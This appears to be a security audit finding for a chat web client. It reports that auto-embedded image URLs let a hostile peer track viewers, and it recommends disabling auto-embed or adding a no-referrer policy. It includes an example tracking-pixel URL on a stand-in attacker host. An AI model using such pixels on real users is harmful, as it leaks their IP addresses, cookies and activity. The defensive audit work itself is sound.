Commit: 2f26d91 · Finding: SEC-W-04
Problem
Any http(s):// URL ending in an image extension in a peer's message body is auto-rendered as <img class="embed-image" src=url> (and wrapped in <a target=_blank>) at crates/web/src/components/message.rs:873-908. Scheme match at crates/web/src/components/message.rs:110-117.
No host allowlist, no referrerpolicy="no-referrer" on the img tag. A hostile peer broadcasting https://tracker.example/pixel.png?ch=<channel>&v=<victim-peer> into a public channel causes every viewer's browser to fetch it, leaking IP, User-Agent, accept-language, cookies, and approximate online time.
Fix
Either:
- (a — recommended, Signal/Discord approach) Disable auto-embed entirely; require explicit click-to-load through a same-origin proxy.
- (b) Add
referrerpolicy="no-referrer" and crossorigin="anonymous" on the <img> tag, and gate auto-embed behind a user preference (off by default).
Commit:
2f26d91· Finding:SEC-W-04Problem
Any
http(s)://URL ending in an image extension in a peer's message body is auto-rendered as<img class="embed-image" src=url>(and wrapped in<a target=_blank>) atcrates/web/src/components/message.rs:873-908. Scheme match atcrates/web/src/components/message.rs:110-117.No host allowlist, no
referrerpolicy="no-referrer"on the img tag. A hostile peer broadcastinghttps://tracker.example/pixel.png?ch=<channel>&v=<victim-peer>into a public channel causes every viewer's browser to fetch it, leaking IP, User-Agent, accept-language, cookies, and approximate online time.Fix
Either:
referrerpolicy="no-referrer"andcrossorigin="anonymous"on the<img>tag, and gate auto-embed behind a user preference (off by default).